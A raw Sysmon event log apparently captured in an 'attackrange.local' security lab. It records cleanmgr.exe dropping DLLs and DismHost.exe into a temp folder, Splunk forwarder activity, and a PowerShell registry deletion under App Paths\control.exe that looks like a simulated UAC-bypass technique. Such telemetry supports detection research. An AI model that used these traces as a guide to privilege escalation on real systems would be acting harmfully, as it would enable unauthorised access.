23542300x80000000000000001051325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-kernel32-legacy-l1-1-0.dllMD5=8E788763C9CDB6E5D1A313C08F7D621E,SHA256=5604FCC803BE14AD10C7A2372FB19BC80D43AD850109A670676982A4EC961473,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-io-l1-1-1.dllMD5=DC7E345A08B64DDD90906151E1D566E9,SHA256=ABDC082DAA40FCAF14E4E554DF23CFC48533F5A2157BD540BFEC49EB8E31E403,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-io-l1-1-0.dllMD5=A4381D04E233B96B657262DE9B31594C,SHA256=17BE2709D85E6B922BDF5D357FB4CD9416234F8E6685226F5EC776E8B3B5A678,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-interlocked-l1-1-0.dllMD5=39646EB20F4366691E3EFF958C99D1D4,SHA256=262D2C2EBAFFA4276F54B05A5A1DA125CC9DCCAF76EAAD3AAF7B23D54EC33C8E,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Core-Heap-Obsolete-L1-1-0.dllMD5=0C5DE8F3B6CC9B44ED0A0556A02F4867,SHA256=D08261783A1749B08F7423923B00FD77E3B44265889B1F550A64239586BC8FC7,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-heap-l1-1-0.dllMD5=51EBE577149EABD170684C2668F967ED,SHA256=0091D6C33047D8EF6E0F09E049DF2CABA5EE6B4F5B1870E0A369D3BF6DB72330,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-handle-l1-1-0.dllMD5=F83CB23123F3E4885547ED29F2BD2360,SHA256=495A9EC7C50D6D72F209E1F69C9B0C292D8D32FBE79FE675128786F8E351B988,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-file-l2-1-1.dllMD5=8B79E85DB9AA6D00794E5151455951BB,SHA256=EE600140599138132439FA9FB9FA6B028A9BF2A206A856CCB1106EFF45459C13,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-file-l2-1-0.dllMD5=455C1AB890C154076E0E23A42F10B6F5,SHA256=DB95D8AA71A8E0A54852C1A83E42267C72E26F2A111AD41146096BF26825FF62,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-file-l1-2-1.dllMD5=A9808572063E5A5649EA59F8B40FC7A8,SHA256=D4FD5081924D4B544188A687BD37127E0A38AF310E77C55F6EC22896B95B3C9C,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-file-l1-2-0.dllMD5=4438E1D7952A77B7F71FF45EF821814F,SHA256=1C4FA5120E310E49C8112ACB6E594DB2F581AE4B6BA6241EEA4301E0E373959F,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.691{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-file-l1-1-0.dllMD5=FF5C179E19923B65E650B11283250D50,SHA256=CF84455BC2AADF2960F0AE4D3691BF3032F412578CB2730A27848C6B26D00225,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-fibers-l1-1-1.dllMD5=A263189D905386A2A91CD2EB39D3365D,SHA256=7392027920D102DBE4C2C15590CC471063D6B1456CAA797BB71F8973C60B47FC,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-fibers-l1-1-0.dllMD5=A1827E232474C845B7A495D1A4CA6169,SHA256=A95088251923F1233CA4F5675457D6D6B2A1601734D4B5451420298491864746,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-errorhandling-l1-1-1.dllMD5=E98BCC3FA25D6DB36D50786EF08DBADD,SHA256=7BDA00F42BE64BCC1022EC3000FE2582CDF4CC89083D868ACA9DCE982C98C52C,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-errorhandling-l1-1-0.dllMD5=14E8A42D84E459F617344438903680EE,SHA256=1FCB6E1908C13B5184373E83B3C13FCF96B55E4FBBC8AAF4D6E9DA604DB75848,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-delayload-l1-1-0.dllMD5=762D2E52FAFE433C50648FC23D7C3E76,SHA256=53238588E10FFAABA96C751D34181BA04A869A0474757E79D9FE82ABC3DC7CFE,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-debug-l1-1-1.dllMD5=1652E7B742F30832826B48E62485BFC7,SHA256=0362AFCDFB6CA89CDEE0DACEC94A5E45D6910B5337343149007DE2443050D154,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-debug-l1-1-0.dllMD5=E02F6786930435C736D71E9B6B898773,SHA256=4C0F43EAC3834878F16175B17427C0195A3213B7CDF9702447667D703AA29B54,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-datetime-l1-1-1.dllMD5=78876D83AA27E510EC3DC3355D034B92,SHA256=44A696C4626AF85EA565D651D7FAF5E21B6EB0C6EE47EE93419D8A7BAD565278,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-datetime-l1-1-0.dllMD5=CF9560A4450AC70C51866581802AE8CC,SHA256=A7A23DC37F028D38D2836CE881FCFF1FD066538588B207BBBCC3B1AB96E3AB62,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-console-l1-1-0.dllMD5=893E267BD0B91FADAC2A2BAE70FD0400,SHA256=17D17AC0383117E9A14D7687ECAA3B27AF1C71B89687A5C3E5B8761B2E64EDFC,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-comm-l1-1-0.dllMD5=C7EC73197892D7F63059C10D19BD5D90,SHA256=768E17ED08111FD22BAAC8FAC00C7DD87F0E57FEFCDAC58CE04B868528B2FDFC,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-com-l1-1-0.dllMD5=08A5A3129DCB52F3C4E51EE3C4A827E7,SHA256=3C6549832275052BCC2234CC4433D95407800ED65359F5147C4762EE0C71F712,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.675{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-base-util-l1-1-0.dllMD5=29CD6DDC6BADE9098B9A4402C6336D62,SHA256=B97C475AA8241C9B674E8C51C387AFAAA7977B036D9E2F7FAFB6CACC11D985BE,IMPHASH=00000000000000000000000000000000truetrue 534500x80000000000000001051300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.660{466BC892-F5CA-60EB-6E7D-00000000CF01}9644C:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismHost.exe 23542300x80000000000000001051299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.276{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98D94AE3E1A40F5042FDE95B2B90A48D,SHA256=C8138AB8B9E31EDCA8180700FA5A721650A0C7F76DA0509C4CEEBE83B76FD747,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.886{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAC64A4ED38ECE062477132436226471,SHA256=2A5F85EE8475D75E911B1B54E5CE775A9A6F620927A4BCB5145BCE6F4FF3A054,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.590{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=898E614AB77CC6711C3985022780BB77,SHA256=A277F80A0AB2C765211427930AF32AF79BE15CC043A04F04A2EDAE065CDCB575,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.474{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9638489E830A4EA2B6EA8A28D6EC4177,SHA256=1EBC98F5E2B80355ED2BC7B6AFA3465B213AB97EEE49067E34610D559860C26F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.474{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5FE-60EB-8B7D-00000000CF01}10092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:50.459{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.459{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:50.459{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.459{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F5FE-60EB-8B7D-00000000CF01}10092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:50.459{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.459{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5FE-60EB-8B7D-00000000CF01}10092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.276{466BC892-F5FE-60EB-8B7D-00000000CF01}10092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808583Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:50.211{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8546316859AB2E6EE28BDAF4511EE7FF,SHA256=B76C537D244A98977252A5DC3A3BDA45F243A5FB5C9591B8169FA650B1AB51F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.259{466BC892-F5F9-60EB-897D-00000000CF01}1072ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001051445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 
07:57:50.243{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe 23542300x80000000000000001051478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.964{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD2A8945AC3D3EC046DF36CC15B01932,SHA256=24FB1D6A848CAA072F6CFAF9CC06FD10281EC123C759FD3AB6BA55BACB57F3FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.896{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5FF-60EB-8D7D-00000000CF01}1328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:51.880{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dl